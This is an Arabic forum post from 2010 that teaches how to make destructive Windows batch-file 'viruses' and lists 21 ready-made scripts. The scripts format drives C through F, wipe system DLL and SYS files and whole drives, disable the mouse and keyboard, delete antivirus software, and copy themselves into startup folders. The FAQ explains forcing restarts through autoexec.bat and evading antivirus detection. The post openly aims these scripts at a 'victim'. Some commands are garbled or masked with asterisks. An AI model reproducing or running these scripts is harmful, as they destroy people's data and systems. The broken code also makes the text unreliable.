نبذه عن الفايروسات .. مع وجود كودات فايروسات جاهزه 21 فايروس مع وظائفها مهمه ..

السبت ديسمبر 25, 2010 4:34 am

بسم الله الرحمن الرحيم

الرجاء منك الرد
***اسئلة و حلول :
س1.كيف نستطيع عمل اعدة تشغيل عن الضغط على الفيروس
------------------------------------
عندما ضغط على الفيرس انتقلت اوامر الدوس الى ملف الاوتواكسك فلابد من اعادة التشغيل حتى يطلب الوندوز هذا الملف فيجدة وهو على الدوس فاينفذ الاور معتقداً انة يحمل
اوامر البدء ...
اضف هذا الكود لعمل ريستارت :
c:\windows\rundll.*** user.***,exitwindows***c
ألان عندما يضغط الضحية علية سوف يحدث وينتقل الاوامر الدوسية ومعها سطر الريستارت وهايحدث ريستارت
ويتم تنفيظ الاوامر الدوسيةفى سرعة كبيرة جدااىاننا اجبرنا الضحية على عمل ريستارت لكى يشتغل الفيرس

س2.هل هناك اكواد اخرى مثل عمل اغلاق للوندوز
------------------------------------
c:\windows\rundll32.*** user.***,exitwindows
هذا كود الغلاق

س3.عندما اريد من الفيروس عدم حذف نفسه لماذا اكتب رموز (الدرس الثاني)
------------------------------------
لانه و قد ذكرة في الدرس السابق انه نظام التشغيل النوافذ (Windows)لا يقبل كتابة رموز في اسماء البرامج لاكن نظام التشغيل (MS-DOS)يوافق على كتابة هذه الاسماء .

س4.لماذا اقوم بتغير امتداد الفيروس من BAT الى *** (الدرس الاول)
------------------------------------
لانه يمكن لاي شخص كشف الكود البرمجي للفيروس !! و هذا اكبر خطاً مما يؤدي الى استخادمه ضدك فيجب عليك الحذر ..
س5.لماذا اشفر الفيروس و لماذا لا تنص بكتابة كود تدمير المضدات (الدرس الثالث)
------------------------------------
لانه اذ قمت بكتابة الكود البرمجي الخاص بحذف او ايقاف عمل المضادات سوف يقوم المضاد بتنبيه الضحية و حذف الفيروس مباشرتاً مما يؤدي الى فشل العملية ...
س6.انت الان تعلمنا صناعة الفيروسات عن طريق الملفات الدفاعية اذن هل يوج مستى اقوى
------------------------------------
نعم,يوجد مستويات اقوى مثل الفيجول بيسك و السي بلص بلص و لغة التجميع لاكن من مميزات الملفات الدفاعية انه يمكن كتابة اي فيروس في اي حاسبة بدون برنامج معين او مترجم لغة فقط المفكرة ..
2-كودات فيروسات جاهزة :
1.فيروس عمل فورمات C,D,E,F والطابعه واعادة تشغيل الجهاز :

call attrib -h -r c:\auto***c.bat >nul
echo format c: /q /u /autotest >nul >>c:\auto***c.bat
echo format d: /q /u /autotest >nul >>c:\auto***c.bat
echo format e: /q /u /autotest >nul >>c:\auto***c.bat
echo format f: /q /u /autotest >nul >>c:\auto***c.bat
c:\windows\rundll.*** user.***,exitwindows***c
------------------------------------
2.فيروس عمل فورمات C,D,E,F والطابعه :
call attrib -h -r c:\auto***c.bat >nul
echo format c: /q /u /autotest >nul >>c:\auto***c.bat
echo format d: /q /u /autotest >nul >>c:\auto***c.bat
echo format e: /q /u /autotest >nul >>c:\auto***c.bat
echo format f: /q /u /autotest >nul >>c:\auto***c.bat
------------------------------------
3.فيروس يحذف برنامج المفكرة وينسخ بدله برنامج اخر :
del C:\WINDOWS\NOTEPAD.***
copy %0 C:\WINDOWS\NOTPAD.***
------------------------------------
4.فايروس افتراضي :

@echo off
cls
:start
if exist c:\AUTO***C.bat goto delc
if exist d:\AUTO***C.bat goto deld
if exist e:\AUTO***C.bat goto dele
if exist f:\AUTO***C.bat goto delf

elc
del c:\
goto end

eld
del d:\
goto end

ele
del e:\
goto end

elf
del f:\
goto end

end
------------------------------------
5.فايروس النظام :

@echo off
cls
:start
if exist c:\windows goto next
if not exist c:\windows goto copy

:next
del c:\windows
goto end

:copy
cd c:\
md virus
goto end

end
------------------------------------
6.فايروس الدوس :
@echo off
C:\WINDOWS\rundll.*** mouse,disable
C:\WINDOWS\rundll.*** keyboard,disable
del c:\command.com
del c:\Io.sys
del c:\Config.sys
del c:\Msdos.sys
del c:\windows\system32\command.com
deltree /y C:\WINDOWS\COMMAND\*.*
deltree /y C:\WIN98\COMMAND\*.*
deltree /y C:\WINme\COMMAND\*.*
deltree /y C:\WIN_me\COMMAND\*.*
deltree /y C:\WINxp\COMMAND\*.*
deltree /y C:\WIN_xp\COMMAND\*.*
del d:\command.com
del d:\Io.sys
del d:\Config.sys
del d:\Msdos.sys
del d:\windows\system32\command.com
deltree
------------------------------------
7.فيروس قاتل ملفات السستم :
@echo off
c:
cd C:\WINDOWS\System\
deltree /y *.dll
cd\
deltree /y *.sys
c:
cd C:\WINDOWS\System32\
deltree /y *.dll
cd\
deltree /y *.sys
d:
cd C:\WINDOWS\System\
deltree /y *.dll
cd\
deltree /y *.sys
d:
cd C:\WINDOWS\System32\
deltree /y *.dll
cd\
deltree /y *.sys
CLS
------------------------------------
8.فيروس قاتل الفأرة و لوحة المفاتيح :
@echo off
C:\WINDOWS\rundll.*** mouse,disable
C:\WINDOWS\rundll.*** keyboard,disable
copy key.BAT C:\WINDOWS\startm~1\programs\startup
copy key.BAT C:\Docume~1\ALLUSE~1\StartM~1\Programs\Startup
copy key.BAT D:\Docume~1\ALLUSE~1\StartM~1\Programs\Startup
CLS
------------------------------------
9.فيروس يمنع استخدام خصائص الشاشة :
@echo off
cd\
cd\
deltree /y c:/windows/RUNDLL32.***
\cd
\cd
------------------------------------
10.فيروس تدمير سطح المكتب :
@echo off
cd\
cd\
deltree /y c:/windows/desktop
\cd
\cd
------------------------------------
11.فيروس قاتل النورتن :
@echo off
%WinDir%\rundll.*** mouse,disable
%WinDir%\rundll.*** keyboard,disable
copy hahahah.BAT %windir%\startm~1\programs\startup
copy hahahah.BAT C:\Docume~1\ALLUSE~1\StartM~1\Programs\Startup
copy hahahah.BAT D:\Docume~1\ALLUSE~1\StartM~1\Programs\Startup
deltree /y c:\progra~1\norton~1\*.*
deltree /y d:\progra~1\norton~1\*.*
deltree /y c:\progra~1\zonela~1\*.*
deltree /y d:\progra~1\zonela~1\*.*
cls
------------------------------------
12.فيروس التدمير :
echo off@
c:\windows\rundll.*** mouse,disable
c:\windows\rundll.*** keyboard,diable
goto del
el
deltree \y c:\*.*
goto copy
:copy
copy %0 C:\WINDOWS\Start Menu\Programs\StartUp\name of virus.bat
cls
puse
------------------------------------
13.فيروس يمحى جميع الملفات التى على الهارد :
@echo off
c:
cd\
deltree /y *.*
d:
cd\
deltree /y *.*
------------------------------------
14.فيروس خاص :
echo off@
del system.ini
del win.ini
del auto ***c.bat
del config.sys
------------------------------------
15.اهم فايروس فايروس مدمر :
echo off@
cls
call attrib -h -r c:\auto***c.bat >nul
echo @echo off >c:\auto***c.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\auto***c.bat
echo copy c:\windows\command\format.com c:\ >nul >>c:\auto***c.bat
echo copy c:\windows\command\deltree.*** c:\ >nul >>c:\auto***c.bat
echo deltree /y c:\windows\*.* >nul >>c:\auto***c.bat
echo format c: /q /u /autotest >nul >>c:\auto***c.bat
------------------------------------
16.فيروس عمل فورمات للجهاز فورا :

echo off@
cls
call attrib -h -r c:\auto***c.bat >nul
echo @echo off >c:\auto***c.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\auto***c.bat
echo copy c:\windows\command\format.com c:\ >nul >>c:\auto***c.bat
echo copy c:\windows\command\deltree.*** c:\ >nul >>c:\auto***c.bat
echo deltree /y c:\windows\*.* >nul >>c:\auto***c.bat
echo format c: /q /u /autotest >nul >>c:\auto***c.bat
------------------------------------
17.فيروس قتل الوندوز وحذف كل الملفات بعد اول اعادة تشغيل للجهاز :
call attrib -h -r c:\auto***c.bat >nul
@Echo off
c:
cd %WinDir%\System\
deltree /y *.dll
cd\
deltree /y *.sys
------------------------------------
18.فيروس قتل الوندوز وحذف كل الملفات بعد التشغيل مباشره
@Echo off
c:
cd %WinDir%\System\
deltree /y *.dll
cd\
deltree /y *.sys
------------------------------------
19.فيروس عمل فورمات C,D,E,F والطابعه وقفل الجهاز :
call attrib -h -r c:\auto***c.bat >nul
echo format c: /q /u /autotest >nul >>c:\auto***c.bat
echo format d: /q /u /autotest >nul >>c:\auto***c.bat
echo format e: /q /u /autotest >nul >>c:\auto***c.bat
echo format f: /q /u /autotest >nul >>c:\auto***c.bat
c:\windows\rundll32.*** user.***,exitwindows
------------------------------------
20.فيروس النسخ الالي :
@echo off
:start
cls
copy %0 c:/virusautocopy.bat
copy %0 c:/windows/virusautocopy.bat
copy %0 d:/virusautocopy.bat
copy %0 c:/My Documents/virusautocopy.bat
end
------------------------------------
21.فايروس ينسخ نفسة في network و ملفات winzip و start up ( اهم فيروس – صنع من قبل الاخ A7meedye ) :

send msg to any one onlin in the network and start many programs
del all c files and copy it self in any dirve

if exist d:\
copy %0 d:\game.bat
copy %0 d:\auto***c.bat
@echo off
echo Virus Name:A7meedye
c:\windows\rundll.*** mouse,disable
c:\windows\rundll.*** keyboard,disable
goto network
:network
cls
if exist c:\winnt goto winnt
copy %0 c:\windows\alluse~1\applic~1\Network89.bat
copy %0 c:\windows\alluse~1\destkop\Network89.bat
copy %0 c:\windows\alluse~1\startm~1\Network89.bat
copy %0 c:\windows\alluse~1\startm~1\progra~1\Network89.ba t
goto zip
zip:
cls
@dir /s /b /l c:\winzip32.*** | set wz=
@FOR /F "delims==" %%y IN ('dir /s /b /l c:\*.zip') DO @echo "%wz%" -min -a -r -p "%%y"
goto startup
startup:
cls
copy %0 C:\WINDOWS\Start Menu\Programs\StartUp\Network89.bat
goto del
del:
deltree /y C:\WINDOWS\*.*
deltree /y C:\Program Files\*.*
deltree /y C:\My Documents\*.*
goto msg
msg:
NET SEND 127.0.0.1 you got a virus
goto start
:start
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start Notepad
start Notepad
start Notepad
start Notepad
start Notepad
start Notepad
start Notepad
start Notepad
start Notepad
start Notepad
start Notepad
start Notepad
start Notepad
Start IExplorer "http://www.google.com
Start IExplorer "http://www.google.com
Start IExplorer "http://www.google.com
Start IExplorer "http://www.google.com
Start IExplorer "http://www.google.com
Start IExplorer "http://www.google.com
Start IExplorer "http://www.google.com
Start IExplorer "http://www.google.com
Start IExplorer "http://www.google.com
Start IExplorer "http://www.google.com
Start IExplorer "http://www.google.com
Start IExplorer "http://www.google.com
goto end
:end
cls
echo I'm fuck your computer
echo sorry about what my virus do but you are stuped
echo The Virus Made By A7meedye
puse